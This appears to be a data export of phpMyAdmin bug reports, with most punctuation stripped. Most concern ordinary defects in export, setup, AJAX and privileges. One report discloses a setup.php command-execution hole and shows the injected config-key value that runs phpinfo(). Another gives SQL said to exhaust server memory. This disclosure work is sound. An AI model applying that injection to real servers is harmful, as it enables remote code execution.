I ve a Windows installation with Mysql 5.1 and InnoDB tables with my.ini variable lower case table names=2 i m having an error on Costrains while exporting a table that reference to another named dettAttivita on filesystem windows NTFS) the file is stored correctly as dettAttivita.frm exporting this table, the code is ALTER TABLE `dettServizi` [cut] ADD CONSTRAINT `dettServizi ibfk 4` FOREIGN KEY `idc dettAttivita`) REFERENCES `dettattivita` `id dettAttivita`); instead of, like another linux installation that works correctly ALTER TABLE `dettServizi` [cut] ADD CONSTRAINT `dettServizi ibfk 4` FOREIGN KEY `idc dettAttivita`) REFERENCES `dettAttivita` `id dettAttivita`); Original URL https sourceforge.net p phpmyadmin bugs 3055 Original author anonymous Found in version 3.3.4","bug"
"24444","9428","Export DISTINCT COLUMN ) invalid data in XLS 2003,2007.
Return only 1st character per row Server version 5.0.45 log Apache 2.2.6 FreeBSD) mod ssl 2.2.6 OpenSSL 0.9.8e DAV 2 PHP 5.2.5 with Suhosin Patch MySQL client version 5.0.45 PHP extension mysql Original URL https sourceforge.net p phpmyadmin bugs 3056 Original author anonymous Found in version 3.3.4","bug"
"24444","9429","Setup forces numeric MemoryLimit.
Today I ran into the problem described here after starting a PMA configuration v 3.3.4) from scratch using the included setup https sourceforge.net tracker ?func=detail atid=377408 aid=2883381 group id=23067 I noticed that setup suggests entering a value like you would usually do in php.ini.
32M is given as an example.
However, the field in which the value needs to be entered seems to filter out anything non numeric characters which makes it impossible to enter 32M or anything else ending in K, G, etc.
The setup automatically makes it 32 without the M which could result in problems running phpMyAdmin as described in the thread I mentioned.
I found this on a freshly downloaded phpMyAdmin 3.3.4 all languages.
No old configuration was used, I started from scratch and did all changes in the setup.
Original URL https sourceforge.net p phpmyadmin bugs 3057 Original author boosty martijn Found in version 3.3.4","bug"
"24444","9430","Odd cfg[ LoginCookieValidity ] default value.
The cfg[ LoginCookieValidity ] setting contains the value 1440.
This value are the seconds until a cookie will be invalid on inactivity but 1440 seconds are 24 minutes.
Maybe the programmer thought the value are minutes instead of seconds because 1440 minutes are 24 hours which makes more sense.
In my opinion this value should be set to 86400 seconds this are 1440 minutes) or to 1800 seconds this is the old value of 30 minutes).
Original URL https sourceforge.net p phpmyadmin bugs 3058 Original author sworddragon Found in version 3.3.4","bug"
"24444","9431","ereg functions are deprecated.
As first reported by gcan2 here https sourceforge.net projects phpmyadmin forums forum 72909 topic 3762139 PHP 5.3 depreceates the ereg ) function which PMA seems to use in db structure.php.
http php.net manual en migration53.deprecated.php http www.php.net manual en function.ereg.php The PHP documentation suggest using preg match ) instead.
Original URL https sourceforge.net p phpmyadmin bugs 3059 Original author ibennetch","bug"
"24444","9432","Column named `default` outputted incorrectly in export.
If a column in a table is named default, the export tool will add it to the .sql dump as default, not `default` which it should as the former is a MySQL reserved word.
Original URL https sourceforge.net p phpmyadmin bugs 3060 Original author gmiernicki Found in version 3.2.3","bug"
"24444","9433","split ) is deprecated.
Yo other has DEPRECATED function... array split string pattern , string string [, int limit ] ) Warning This function has been DEPRECATED as of PHP 5.3.0.
Relying on this feature is highly discouraged.
do you need help to correct that 4?
Original URL https sourceforge.net p phpmyadmin bugs 3061 Original author anikushin","bug"
"24444","9434","Unable to export more than 702 columns to Excel.
The current function that converts column numbers to the Excel format A, ..., Z, AA, ..., ZZ, AAA, ...) cannot handle Excel column names larger than two characters A=1 to ZZ =702 is possible, AAA = 703 and further is not.
Original URL https sourceforge.net p phpmyadmin bugs 3062 Original author ruleant Found in version Latest Git","bug"
"24444","9435","inline sql edit got undefined.
first, i m sorry about i m not sure wether the category i selected is right here is the problem when a explain query errors, inline editor can t got the wrong sql correctly i have tested following wrong sql query gt; SELECT FROM `user`; correct got data gt; SELECT FROM `user` WHERE; wrong cause an 1064 syntax error gt; EXPLAIN SELECT FROM `user`; correct got the query information gt; EXPLAIN SELECT FROM `user` WHERE; wrong cause an 1064 syntax error after first there query, try using inline to edit the sql, it works fine but when after last query, inline can t detect the sql, it said undefined , but all others eg.
edit, skip explain sql, create php code) can got the wrong sql correctly Original URL https sourceforge.net p phpmyadmin bugs 3063 Original author rimyxp Found in version Latest Git","bug"
"24444","9436","It fails to edit rows with positive DECIMAL 16,6).
I have a table with two DECIMAL 16,6) field.
When I browse my table and click on the edit icon, PHPMyAdmin fails to load this row because its criterias are wrong it wraps the DECIMAL field name with CONCAT ).
Without CONCAT ) it s working perfectly.
And if the field has a value of 0.000000 it works too.
Here is the SELECT request generated when I want to edit a row SELECT FROM `mydb`.`accounts` WHERE `accounts`.`id` =0 AND `accounts`.`admin login` = dd AND `accounts`.`admin password` = dd AND CONCAT `accounts`.`SYNC LMT` ) = 0.000000 AND `accounts`.`SYNC LMB` =0 AND CONCAT `accounts`.`SYNC DBMT` ) = 1279557821.443215; = gt; MySQL returned an empty result set i.e.
zero rows).
Here is my table structure and content CREATE TABLE IF NOT EXISTS `accounts` `id` int 11) NOT NULL, `admin login` varchar 100) CHARACTER SET utf8 NOT NULL, `admin password` varchar 100) CHARACTER SET utf8 NOT NULL, `SYNC LMT` decimal 16,6) unsigned NOT NULL, `SYNC LMB` int 2) unsigned NOT NULL, `SYNC DBMT` decimal 16,6) unsigned NOT NULL, KEY `id` `id`), KEY `SYNC LMT` `SYNC LMT`), KEY `SYNC LMB` `SYNC LMB`), KEY `SYNC DBMT` `SYNC DBMT`) ) ENGINE=MyISAM DEFAULT CHARSET=latin1; Dumping data for table `accounts` INSERT INTO `accounts` `id`, `admin login`, `admin password`, `SYNC LMT`, `SYNC LMB`, `SYNC DBMT`) VALUES 0, dd , dd , 0.000000, 0, 1279557821.443215); Original URL https sourceforge.net p phpmyadmin bugs 3064 Original author antares7364","bug"
"24444","9437","left navigation got wrong database name.
it seems the summary limited the length left navigation got wrong database name after creating user if contains dot please follow these steps 1\.
login to the pma using root 2\.
click Privileges on the right top navigation 3\.
click Add a new User after the current user list 4\.
username a.b host localhost Generate password choose Create database with same name and grant all privileges then Go problem normally it will create the user and database, then switch into the database, but now it go into a database called b , which is not exists on my mysql server, dropdown list in the left navigation frame shows Databases ...) when click the Create table below, you can see Error MySQL said b database does not exist.
Original URL https sourceforge.net p phpmyadmin bugs 3065 Original author rimyxp Found in version 3.3.5","bug"
"24444","9438","Rights privileges dialog presents wrong data.
Consider the following setting Create a table with 2 columns and grant select privileges to both columns to some user.
Now drop one column and add a new one).
When I now go to the privileges view, the deleted column still shows up and is selected in the listbox when you click on save, first all privileges are revoked and no new privileges are granted due to an error) gt; if you don t have a backup privileges are lost.
Solution or improvement Provide 2 new functions 1\.
List broken privileges 2\.
Fix broken privileges for 1 select from mysql.db where Db not in select SCHEMA NAME from INFORMATION SCHEMA.SCHEMATA); select from mysql.tables priv where Db,Table name) not in select TABLE SCHEMA,TABLE NAME from INFORMATION SCHEMA.TABLES); select from mysql.columns priv where Db,Table name, Column name) not in select TABLE SCHEMA,TABLE NAME,COLUMN NAME from INFORMATION SCHEMA.COLUMNS); FLUSH PRIVILEGES ; for 2 delete from mysql.db where Db not in select SCHEMA NAME from INFORMATION SCHEMA.SCHEMATA); delete from mysql.tables priv where Db,Table name) not in select TABLE SCHEMA,TABLE NAME from INFORMATION SCHEMA.TABLES); delete from mysql.columns priv where Db,Table name, Column name) not in select TABLE SCHEMA,TABLE NAME,COLUMN NAME from INFORMATION SCHEMA.COLUMNS); FLUSH PRIVILEGES ; Original URL https sourceforge.net p phpmyadmin bugs 3066 Original author csware Found in version 3.3.4","bug"
"24444","9439","0 row s) affected.
When no control user is defined but the pma tracking mechanism is defined, the number of rows affected by an UPDATE for example), is displayed as 0.
Original URL https sourceforge.net p phpmyadmin bugs 3173 Original author lem9 Found in version 3.3.9","bug"
"24444","9440","Issuing truncate queries cause problems.
If I issue truncate queries like TRUNCATE `cms page property tmp`; TRUNCATE `cms tmp`; TRUNCATE `sitemap tmp`; TRUNCATE `suche tmp`; and submit them using the SQL textarea 1\.
I m not asked like I would on delete queries 2\.
the output is broken on the next page twice the repeated SQL query in the contains mysql responses which are html escaped twice amp;nbsp; is readable there for the user) the preinserted SQL command in the SQL textarea contains the mysql responses, too so one cannot issue this query again w o editing it) TRUNCATE `cms page property tmp`; MySQL lieferte ein leeres Resultat zurxc3xbcck d. amp;nbsp;h. null Zeilen).
TRUNCATE `cms tmp`; MySQL lieferte ein leeres Resultat zurxc3xbcck d. amp;nbsp;h. null Zeilen).
TRUNCATE `sitemap tmp`; MySQL lieferte ein leeres Resultat zurxc3xbcck d. amp;nbsp;h. null Zeilen).
TRUNCATE `suche tmp`; MySQL lieferte ein leeres Resultat zurxc3xbcck d. amp;nbsp;h. null Zeilen).
Original URL https sourceforge.net p phpmyadmin bugs 3067 Original author csware Found in version 3.3.4","bug"
"24444","9441","subquery wrong sql statement for export.
If i enter a sql statement with subselect) and want to export some of the entries a syntactically wrong sql statement results SELECT user FROM `jufiuser` WHERE user NOT IN SELECT user FROM bedenk ) results in SELECT user FROM bedenkmass) WHERE `jufiuser4`.`user` = bay ) ) AND user NOT IN SELECT user FROM bedenkmass ) ) Original URL https sourceforge.net p phpmyadmin bugs 3068 Original author anonymous Found in version 3.4.9","bug"
"24444","9442","php error on view structure.
Notice in .
libraries string.lib.php 147 Undefined offset 289 Backtrace .
libraries sqlparser.lib.php 723 PMA STR binarySearchInArr string UTF8, array, integer 291, ) .
tbl structure.php 141 PMA SQP parse string CREATE ALGORITHM=UNDEFINED DEFINER=`root` `localhost` SQL SECURITY DEFINER VIEW `customer list` AS select `cu`.`customer id` AS `ID`,concat `cu`.`first name`, utf8 ,`cu`.`last name`) AS `name`,`a`.`address` AS `address`,`a`.`postal code` AS `zip code`,`a`.`phone` AS `phone`,`city`.`city` AS `city`,`country`.`country` AS `country`,if `cu`.`active`, utf8 active , utf8 ) AS `notes`,`cu`.`store id` AS `SID` from `customer` `cu` join `address` `a` on `cu`.`address id` = `a`.`address id`))) join `city` on `a`.`city id` = `city`.`city id`))) join `country` on `city`.`country id` = `country`.`country id`)))) Reproducible on http demo.phpmyadmin.net trunk config tbl structure.php?db=sakila table=customer list Original URL https sourceforge.net p phpmyadmin bugs 3069 Original author nijel Found in version Latest Git","bug"
"24444","9443","triggers not fetched if dbname has an hyphen.
Triggers are not displaying if the database has a hyphen ) in the database name.
Original URL https sourceforge.net p phpmyadmin bugs 3070 Original author anonymous Found in version 3.3.5","bug"
"24444","9444","error when edit record with geometry.
If a table has a geometry column the error always occurs when saving edited record.
phpMyAdmin seems to think the geometry value has changed when it has not.
This may occur with any blob.
Needs to just ignor geometry column.
Original URL https sourceforge.net p phpmyadmin bugs 3071 Original author stevesmith97","bug"
"24444","9445","Multiple servers with signon authentication.
I tried to set up signon based authentication for phpmyadmin, but when using multiple servers with this set up, the same username, password, and hostname, is being used for all configured servers.
It works fine for a single server, and having one signon based, one config based, etc, also works.
But for multiple servers where all servers use signon based authentication, this just isn t working.
Testing by putting a simple die ) in the signon script shows that the signon URL isn t actually getting called when switching between configured servers via the dropdown on the main PHPMyAdmin page.
Is this a bug, or am I missing something?
Original URL https sourceforge.net p phpmyadmin bugs 3072 Original author wpalmer Found in version 3.3.5","bug"
"24444","9446","auth type signon odd behaviour at ex and importing.. after switching to auth type signon like described here http wiki.phpmyadmin.net pma Auth types) we notice odd behavour of phpmyadmin at ex and importing sql files.
uncompressed sql exporting is only possible if cfg[ MemoryLimit ] is set to huge values.
with compression it works in more cases.
at importing behaviour is at follows if i use firefox and small sql files a aja message is shown The file being uploaded is probably larger than the maximum allowed size or this is a known bug in webkit based Safari, Google Chrome, Arora etc.)
browsers.
But neither i am using a browser with webkitengine nor my upload limits are reached.
if i use regular auth type http all is working fine.
in support forum we could not find a solution https sourceforge.net projects phpmyadmin forums forum 72909 topic 3777936 we use apache 2.2.10 and php 5.2.12 as common mod php i hope someone will have a look at it Thanks, Hnas Original URL https sourceforge.net p phpmyadmin bugs 3073 Original author hansmeiser2 Found in version 3.5.5","bug"
"24444","9447","LockFromUpdate checkbox not checked by default.
the LockFromUpdate checkbox in the sql query edit popup window is not checked by default.
line 365 of libraries sql query form.lib.php reads document.writeln lt;input type= checkbox name= LockFromUpdate value= 1 id= checkbox lock gt; lt;label for= checkbox lock gt; lt;?php echo GLOBALS[ strQueryWindowLock ]; ?
gt; lt; label gt; ); it should read document.writeln lt;input type= checkbox name= LockFromUpdate checked= checked id= checkbox lock gt; lt;label for= checkbox lock gt; lt;?php echo GLOBALS[ strQueryWindowLock ]; ?
gt; lt; label gt; ); note attribute change from value= 1 to checked= checked , per w3c http www.w3.org TR html401 interact forms.html h 17.4) this makes the LockFromUpdate checkbox in the sql query edit popup checked by default, as i believe the erroneous attribute was meant to do.
http www.w3.org TR html401 interact forms.html h 17.4 this makes the LockFromUpdate checkbox in the sql query edit popup checked by default, as i believe the erroneous attribute was meant to do.
Original URL https sourceforge.net p phpmyadmin bugs 3074 Original author anonymous","bug"
"24444","9448","Tab Privilege don t show real privileges.
I have two users in mysql.user table, both with password, host set to localhost.
If I click on Privileges tab on first page, I see three rows.
user, host, password, Global privileges, Grant root, localhost, Yes, ALL PRIVILEGES, Yes myuser, , , USAGE, No myuser, localhost, Yes, USAGE, No The second row is not corrent, or I am missing something?
Original URL https sourceforge.net p phpmyadmin bugs 3075 Original author sv7874 Found in version 3.3.5","bug"
"24444","9449","Setup undefined function PMA sendHeaderLocation.
Testing against the latest development version using Git.
I ll be the first to admit that this bug is en edge case.
However, it just happened to a friend how tried to install the latest Debian PHPMyAdmin package 3.3.5 1), It only happens if you access http example.org phpmyadmin setup AND ForceSSL is 1 true.
The Debian maintainer has set ForceSSL to true in var lib phpmyadmin config.inc.php.)
Logging in at http example.org phpmyadmin redirects correctly to https example.org phpmyadmin The error is PHP Fatal error Call to undefined function PMA sendHeaderLocation ) in home hans www testing phpmyadmin libraries common.inc.php on line 324 .
The reason is that setup lib common.inc.php sets PMA MINIMUM COMMON.
I have attached one possible solution patch.
Original URL https sourceforge.net p phpmyadmin bugs 3076 Original author hansfn","bug"
"24444","9450","Missing backtick in query able to crash server.
[ENVIRONMENT DETAILS] Linux srv dev 06 2.6.24 24 server 1 SMP Fri Sep 18 16 47 05 UTC 2009 x86 64 GNU Linux Ubuntu 8.04.3 LTS MySQL charset UTF 8 Unicode utf8) Apache 2.2.8 Ubuntu) PHP 5.3.2 MySQL client version 5.0.51a PHP extension mysqli [FAULTY QUERY THAT PMA DOES NOT HANDLE CLEANLY missing backtick before second table name) ] SELECT FROM `a table` tbla INNER JOIN b table` tblb ON tblb.id = tbla.id WHERE tblb.field1 != tbla.field1; [WITH SOME DATA PRESENT IN BOTH TABLES, I AM ABLE TO EVENTUALLY CRASH OUR SERVER] USE your database here; DROP TABLE IF EXISTS a table; CREATE TABLE `a table` `id` int 11) NOT NULL, `field1` varchar 255) NOT NULL, PRIMARY KEY `id`) ) ENGINE=MyISAM DEFAULT CHARSET=latin1; DROP TABLE IF EXISTS b table; CREATE TABLE `b table` `id` int 11) NOT NULL, `field1` varchar 255) NOT NULL, PRIMARY KEY `id`) ) ENGINE=MyISAM DEFAULT CHARSET=latin1; DROP PROCEDURE IF EXISTS make test data; DELIMITER CREATE PROCEDURE make test data ) BEGIN DECLARE c INT; SET c = 20000; WHILE c gt; 0 DO INSERT INTO a table id, field1) SELECT c, 0; INSERT INTO b table id, field1) SELECT c, 1; SET c = c 1; END WHILE; END DELIMITER ; CALL make test data ); SELECT FROM `a table` tbla INNER JOIN b table` tblb ON tblb.id = tbla.id WHERE tblb.field1 != tbla.field1; [BEHAVIOR OF ABOVE PMA WILL NEVER COME BACK.
SERVER EVENTUALLY RUNS OUT OF MEMORY AND CPU] Original URL https sourceforge.net p phpmyadmin bugs 3077 Original author dkwright Found in version 3.2.3","bug"
"24444","9451","error when viewing table content structure.
Open a database and click on a table Error uncaught exception Syntax error, unrecognized expression [object HTMLLIElement] in jquery 1.4.4.js 3321 Browser www client chromium 10.0.648.6 on linux 64bit 2.6.38 rc1 Original URL https sourceforge.net p phpmyadmin bugs 3188 Original author flokli Found in version Latest Git","bug"
"24444","9452","pmadb data deleted after DROP any table.
There s a bug in version 3.3.3 and it persists in version 3.3.5.
All the relations stored in PMA database) for a database are deleted after drop any table of the same database.
It should delete all the relationships concerning the table that you are dropping but it make a delete for all relations stored for the database.
In the Mysql log DELETE FROM `phpmyadmin`.`pma relation` WHERE master db = exampledb If you are upgrading phpmyadmin from a prior version you should be carefully, because when you drop any table all you stored relations made before will go away.
I will attach the complete log for making easy to debug the problem.
Apache 2.2, PHP v5.2, Mysql 5.0 Original URL https sourceforge.net p phpmyadmin bugs 3078 Original author zairus Found in version 3.3.5","bug"
"24444","9453","wrong authentication used until browser restart.
At a stable Gentoo system I observed today, that using first a wrong user name non existing) and after that using another correct) user name password yields into the situation, that phpmyadmins complaints about wrong authentication and presents the first wrong) username.
Restarting the browser firefox) helped.
FWIW I m running kernel 2.6.35, upgraded php to 5.2.14 from 5.2.13) today at a 2.2.15 apache2 furthermore I m using havp as a transparent proxy.
Original URL https sourceforge.net p phpmyadmin bugs 3079 Original author toralf foerster","bug"
"24444","9454","hides more databases than it should, fix included.
Version 3.3.2 cfg[ Servers ][ i][ hide db ] = mysql|information schema|phpmyadmin) ; hides for example database with the name my mysql db Solution is to change line 92 of List Database.class.php to if preg match .
GLOBALS[ cfg ][ Server ][ hide db ] .
, db)) \{ hope it helps Original URL https sourceforge.net p phpmyadmin bugs 3080 Original author potu Found in version 3.3.2","bug"
"24444","9455","fix demo server javascript.
The phpmyadmin demo server under http demo.phpmyadmin.net master config has some google analytics code inside, which is currently broken and keeps showing console errors on my chromium 10.0.648.6.
Uncaught ReferenceError gat is not defined in main.php 501 This confuses users trying to test out the new phpmyadmin, because this error is shown in the console on every page, but has nothing to do with real phpmyadmin code...
Original URL https sourceforge.net p phpmyadmin bugs 3192 Original author flokli","bug"
"24444","9456","command execution vulnerability in setup.
Hello, I found a php command execution vulnerability in scripts setup.php included in phpMyAdmin 2.11.10.
The vulnerability I found is similar to CVE 2009 1151 http www.securityfocus.com bid 34236), but a bit different.
It affects the latest version of phpMyAdmin 2.X.
See attached file, which is a sample exploit php program for phpMyAdmin 2.11.10. curl library required.)
Attached exploit program creates config config.inc.php file on the target machine, which includes the line as below.
cfg[ Servers ][ i][ AllowDeny ][ order ][ a ][ b ][ .phpinfo ). ]
= 1 ; When the config.inc.php is loaded, phpinfo ) will be executed.
The cause is line 521 in scripts setup.php.
520 if type == string ) \{ 521 ret .= get cfg val name .
[ k ] , v); 522 \} elseif type == int ) \{ If the input array is deeply nested, the array key will not be properly encoded nor checked.
Original URL https sourceforge.net p phpmyadmin bugs 3081 Original author tterada","bug"
"24444","9457","Toggling Hide search criteria in Chrome.
I have tested the table search using the source code from current master branch in google chrome 8.0.552.237.
When the search results shown, the link \ Show search criteria\ also shown correctly bellow the tab navigation bar.
Then once we click on that link it slide down the the search criteria form down and changes the link text in to \ Hide search criteria\ bellow the form.
as shown in image 1) Then when we click on the link next time to hide the form at once it get hide and again show the form As shown in the image 2).
Even though the form is still shown the text in the link changes from \ Hide search criteria\ to \ Show search criteria\ .
So this results a mismatch with the link text and from toggling action.
As shown in image 3) I have tested this with firefox browser and in that case it works fine.
The images were attached to the pdf bellow.
My testing environment contains following specifications.
OS Ubuntu 10.10 Server Apache 2.216 Mysql 2.5.0 php 5.3.3 Browser Google Chrome 8.0.552.237 Original URL https sourceforge.net p phpmyadmin bugs 3193 Original author anonymous","bug"
"24444","9458","Import from ODS ignores repeated cells.
I am trying to import from an ODS file, but the import is not being done correctly if a cell has the same value as the cell in the previous column, then the cell gets ignored.
I attach a sample ODS file created it from scratch as a test).
My file has | A | B | C | D | E | | a | b | b | c | d | | a | b | c | d | e | | a | b | c | c | d | | a | b | c | d | e | But after export the table shows | A | B | C | D | E | | a | b | c | d | NULL | | a | b | c | d | e | | a | b | c | d | NULL | | a | b | c | d | e | This is not nice for an input file of several thousand rows... forwarded from http bugs.debian.org 593621 Original URL https sourceforge.net p phpmyadmin bugs 3082 Original author nijel","bug"
"24444","9459","PDF footer wrongly encoded.
The PDF footer seems to use wrong encoding and contains in Czech) text Strana ?xc3xadslo , while it should be Strana xc4x8dxc3xadslo .
Original URL https sourceforge.net p phpmyadmin bugs 3196 Original author nijel Found in version Latest Git","bug"
"24444","9460","PMA linkOrButton and PropertiesIconi.
Even when PropertiesIconic is enabled, PMA linkOrButton still creates button with only image.
This looks especially inconsistent if some links in same table are links and some forms as shown on attached screenshot.
Can be seen on demo server as well http demo.phpmyadmin.net master config index.php?db=sakila Original URL https sourceforge.net p phpmyadmin bugs 3197 Original author nijel Found in version Latest Git","bug"
"24444","9461","BLOB columns don t have NULL checkboxes.
I have a table with a BLOB type column which can be NULL, but row data editor tbl change.php) doesn t display NULL checkboxes for it.
Original URL https sourceforge.net p phpmyadmin bugs 3083 Original author luxintenebris Found in version 3.3.6","bug"
"24444","9462","Progress bar problem.
Hello, I have problem with upload progress.
PHP Version 5.2.6 1 lenny8 json version 1.2.1 uploadprogess 1.0.1 If I try examples from uploadprogress externsion so all is ok.
But in PMA in import, If i send file so In Firefox say that is big file or problem with webkit in browser In Int.
E. show javascript error see bellow) and progress bar is only border without text.
Javascript error in IE translate from czech) Report Building this property or method does.
Row 24 Character 44 Code 0 URI https mysql.gigaserver.cz js mootools.js Can you help me with it?
Thank you Pavel Original URL https sourceforge.net p phpmyadmin bugs 3084 Original author rajcz Found in version 3.3.5","bug"
"24444","9463","Nonexisting link to chk rel.php.
At the main page, there s a link to chk rel.php telling me I don t have some features enabled.
Problem is that this link leads to a nonexistent page.
I use phpmyadmin under alias localhost 8080 db to actual directory var www phpmyadmin .
There is a line 322 in main.php message gt;addParam lt;a href= .
cfg[ PmaAbsoluteUri ] .
chk rel.php?
.
common url query .
gt; , false); I think the PmaAbsoluteUri should be omitted, because PmaAbsoluteUri is not set well.
When the line is like this, it works message gt;addParam lt;a href= chk rel.php?
.
common url query .
gt; , false); Original URL https sourceforge.net p phpmyadmin bugs 3085 Original author horec Found in version 3.3.5","bug"
"24444","9464","Incorrect Showing rows .
In 2.11.10.1, some searches for example looking in an INT column for values gt; 100) always returns Showing rows 0 0 1 total) .
Version 2.11.10.0 was correct for this.
Original URL https sourceforge.net p phpmyadmin bugs 3086 Original author lem9 Found in version 2.11.10.1","bug"
"24444","9465","User preference setting is lost.
Here is the scenario in Settings user preferences) 1\.
In Features General, Enable Ajax and save 2\.
In Main frame Browse mode, change something for example Row marker) and save 3\.
In Features General, Ajax is disabled Original URL https sourceforge.net p phpmyadmin bugs 3203 Original author lem9 Found in version Latest Git","bug"
"24444","9466","Tries to create table on browse.
When trying to browse empty table, I get following error 1050 Table ASSIGNMENT already exists CREATE TABLE ASSIGNMENT ProjectID Int NOT NULL , EmployeeNumber Int NOT NULL , HoursWorked Numeric 6, 2 ) NULL , CONSTRAINT ASSIGNMENT PK PRIMARY KEY ProjectID, EmployeeNumber ) , CONSTRAINT ASSIGN PROJ FK FOREIGN KEY ProjectID ) REFERENCES PROJECT ProjectID ) ON UPDATE NO ACTION ON DELETE CASCADE , CONSTRAINT ASSIGN EMP FK FOREIGN KEY EmployeeNumber ) REFERENCES EMPLOYEE EmployeeNumber ) ON UPDATE NO ACTION ON DELETE NO ACTION ); Yes, phpMyAdmin is trying to CREATE TABLE, when going to following URL http demo.phpmyadmin.net master config sql.php?db=Ashley table=ASSIGNMENT SQL dump is attached.
Original URL https sourceforge.net p phpmyadmin bugs 3204 Original author nijel Found in version Latest Git","bug"
"24444","9467","Navigation full mode no expansion.
With cfg[ LeftFrameLight ] set to false, the list of tables no longer expands when clicking .
Original URL https sourceforge.net p phpmyadmin bugs 3205 Original author lem9 Found in version Latest Git","bug"
"24444","9468","Setup Scripts Has Wrong Parameter.
phpmyadmin 3.3.6 When using Setup script to make a configuration file.
check the checkbox for Connect without password it saves the line below into the config.inc.php file cfg[ Servers ][ i][ noPassword ] = true; This line causes an INVALID SETTINGS ERROR when loading PHPMyAdmin The correct line it should save into the config.inc.php is cfg[ Servers ][ i][ AllowNoPassword ] = true; SUMMARY noPassword Should Be AllowNoPassword Original URL https sourceforge.net p phpmyadmin bugs 3087 Original author stevenmartin99 Found in version Latest Git","bug"
"24444","9469","Procedures and functions not exported.
When exporting in server mode, procedures and functions are missing.
Original URL https sourceforge.net p phpmyadmin bugs 3207 Original author lem9 Found in version Latest Git","bug"
"24444","9470","Phpmyadmin wont load depening on windows HOSTS file contents.
I have tested this as mush as possible and there is nothing i can see that is casuing this.. but When the C windows system32 etc hosts file contains the default shipped with VISTA AND 7) 127.0.0.1 localhost 1 localhost Phpmyadmin will not load.
The page enventually ends up blank.
The Setup Script Loads fine..
Errors load fine.
But the index.php will not load.
Changing only the hosts file to default for what was shipped with XP) 127.0.0.1 localhost Now PHPmyadmin loads fine.
This was tested using WAMPSERVER 2.0 using a range of PHP MYSQL APACHE VERSIONS) all the same results.s Original URL https sourceforge.net p phpmyadmin bugs 3088 Original author stevenmartin99 Found in version 2.11.9","bug"
"24444","9471","SQL query fails.
Running SQL query on database fails, there is a javascript error Error is not defined Source fie http demo.phpmyadmin.net trunk config js sql.js?ts=1282947478 Row 184 And the page never loads Original URL https sourceforge.net p phpmyadmin bugs 3089 Original author nijel Found in version Latest Git","bug"
"24444","9472","Error when running SQL query over AJAX.
Notice in .
libraries display tbl.lib.php 2105 Undefined index url query Backtrace .
sql.php 809 PMA displayTable object, string urdr111111, array, ) .
import.php 458 require .
sql.php) Original URL https sourceforge.net p phpmyadmin bugs 3090 Original author nijel Found in version Latest Git","bug"
"24444","9473","Error on ODS import.
Notice in .
libraries import ods.php 93 Undefined index ods col names Backtrace .
import.php 374 require .
libraries import ods.php) Original URL https sourceforge.net p phpmyadmin bugs 3091 Original author nijel Found in version Latest Git","bug"
"24444","9474","USE query not working.
Running USE test; query with AJAX does not have expected results database is not changed as it used to.
Also when running USE fdasfasdfas; or any non existing database name), the error messages just quickly flashes on the screen and nothing happens.
Original URL https sourceforge.net p phpmyadmin bugs 3092 Original author nijel Found in version 3.3.6","bug"
"24444","9475","strings truncated after import.
there s an import issue existed in quite a few versions, we know the quotes will be converted into entities when using import from outcoming files, and all the strings will be truncated on the stage in forums bug tracking systems, is there any possible to fix this import issue?
Original URL https sourceforge.net p phpmyadmin bugs 3214 Original author steventsang Found in version 3.4.0","bug"
"24444","9476","Modify options for information schema.
In the db structure.php page we have a pulldown menu with several options e.g.
drop, repair, export) For the information schema database these make no sense, therefor I opt to use the db is information schema boolean.
The easiest fix for this groups the export and print options together, and introduce an if statement.
The question is how thought out the current sort order is.
It s not alphabetically.
Original URL https sourceforge.net p phpmyadmin bugs 3093 Original author helmo Found in version Latest Git","bug"
"24444","9477","Inline edit and NULL columns.
Pick a table with a column that can be NULL.
Compare the Edit panel with the Inline edit one.
On the Edit panel you have a NULL checkbox that indicates if the column contains a real NULL value.
The column could also be empty, which is different than being NULL.
When browsing this table, the interface shows NULL if the column contains a NULL but when switching to Inline edit, we should see the same checkbox as in Edit mode this is the only way to indicate if it s null or empty.
Original URL https sourceforge.net p phpmyadmin bugs 3216 Original author lem9","bug"
"24444","9478","Changing password using AJAX broken.
When I change password for some user using AJAX, only Loading... flushes for some time and nothing else changes on the screen.
I d really expect to see some confirmation or error what has happened.
Original URL https sourceforge.net p phpmyadmin bugs 3094 Original author nijel","bug"
"24444","9479","Main page ajax results tiny.
Let me start with a demonstration From the main page click Change password , set a new password, and click Go The resulting page is the normal main page, with the results at the top in a tiny, tiny window, under which is the query SET PASSWORD = The problem, as mentioned, is that the result pane is shown but so tiny that only a portion of the green checkmark even shows through and no text, because the box is so short.
Compare to, for instance, the SQL tab of a database, which shows Your SQL Query has been executed successfully Query took 0.003 sec) and the entire checkmark.
Original URL https sourceforge.net p phpmyadmin bugs 3218 Original author ibennetch Found in version Latest Git","bug"
"24444","9480","Inline edit links problems.
When browsing pma bookmark table, there are two Inline edit links, both with two icon.
Can be seen here http demo.phpmyadmin.net trunk config sql.php?db=phpmyadmin table=pma bookmark Original URL https sourceforge.net p phpmyadmin bugs 3095 Original author nijel Found in version Latest Git","bug"
"24444","9481","Adding more rows in insert duplicates last one.
When adding more rows in insert page, the new ones are created as duplicates of the last one copying their content.
I think the new forms rather should be created empty.
Original URL https sourceforge.net p phpmyadmin bugs 3096 Original author nijel Found in version Latest Git","bug"
"24444","9482","Wrong number of rows to insert.
When changing the number of rows on insert page, the result is sometimes not what would be expected.
For example changing from 2 default) to 10 and then back to 2 gives me just 1 row to insert.
No javascript errors shown in browser, can be reproduced on http demo.phpmyadmin.net trunk config tbl change.php?db=world table=City Original URL https sourceforge.net p phpmyadmin bugs 3097 Original author nijel Found in version Latest Git","bug"
"24444","9483","Unchecking ignore does not work for duplicated insert rows.
When man changes value of row to insert, the Ignore checkbox is unchecked.
However this does not work for javascript added rows, they all try to uncheck second insert row.
Original URL https sourceforge.net p phpmyadmin bugs 3098 Original author nijel Found in version Latest Git","bug"
"24444","9484","AJAX and adding a column.
After adding a column and clicking on save, it stays on the same page; also if I tried to add an existing column I get no feedback.
Original URL https sourceforge.net p phpmyadmin bugs 3099 Original author lem9 Found in version Latest Git","bug"
"24444","9485","edit timestamp field always updates with now ).
Edit a row of a table with a timestamp field gt;see function listbox gt; now ) is checked).
Change a other field or the timestamp field gt; save gt; timestamp is not updated to the new value it s updated to now ) ... think this shouldn t be the default value.
i think the only bug is that the listbox is set to now ) on edit if the field is a timestamp.
with datetime field it works correct.
